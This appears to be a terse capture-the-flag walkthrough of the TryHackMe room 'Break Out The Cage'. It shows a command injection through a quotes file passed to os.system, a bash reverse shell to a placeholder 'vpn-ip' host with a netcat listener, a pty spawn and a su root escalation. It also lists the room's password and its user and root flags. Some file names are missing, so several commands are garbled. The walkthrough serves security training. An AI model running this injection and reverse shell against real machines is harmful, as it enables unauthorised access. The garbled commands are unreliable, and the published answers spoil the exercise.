Break Out The Cage

get dad_tasks


Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!! One. Revamp the website Two. Put more quotes in script Three. Buy bee pesticide Four. Help him with acting lessons Five. Teach Dad what "information security" is. In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes


==weston:Mydadisghostrideraintthatcoolnocausehesonfirejokes== (weston found in source code also question)

sudo -l
sudo /usr/bin/bees

Broadcast message from weston@national-treasure (pts/0) (Sat Aug 13 16:52:24 20 AHHHHHHH THEEEEE BEEEEESSSS!!!!!!!! (through wall)

find / -type f -user cage 2>/dev/null

/opt/.dads_scripts/ /opt/.dads_scripts/.files/.quotes

cat /opt/.dads_scripts/

#!/usr/bin/env python #Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!) import os import random lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines() quote = random.choice(lines) os.system("wall " + quote)

cat /opt/.dads_scripts/.files/.quotes

reverse shell

cat > << EOF-EOF block to print the contents enclosed within this block in the terminal.

cat > /tmp/ << EOF

write #!/bin/bash bash -i >& /dev/tcp/vpn-ip/4444 0>&1 EOF

or just nano

cat /tmp/ #!/bin/bash bash -i >& /dev/tcp/vpn-ip/4444 0>&1

chmod +x /tmp/
printf 'anything;/tmp/\n' > /opt/.dads_scripts/.files/.quotes

netcat(kali machine)

rlwrap nc -nlvp 4444 
cat Super_Duper_Checklist

1 - Increase acting lesson budget by at least 30% 2 - Get Weston to stop wearing eye-liner 3 - Get a new pet octopus 4 - Try and keep current wife 5 - Figure out why Weston has this etched into his desk: ==THM{M37AL_0R_P3N_T35T1NG}==

priv esc

cat email_backup/*

found cageisnotalegend and key face vigenere-tool


python3 -c "import pty;pty.spawn('/bin/bash')"
su root

pass: cageisnotalegend

cat /root/email_backups/*


  • What is Weston's password?Mydadisghostrideraintthatcoolnocausehesonfirejokes

  • What's the user flag?THM{M37AL_0R_P3N_T35T1NG}

  • What's the root flag?THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3}

[[Gotta Catch'em All!]]

Last updated

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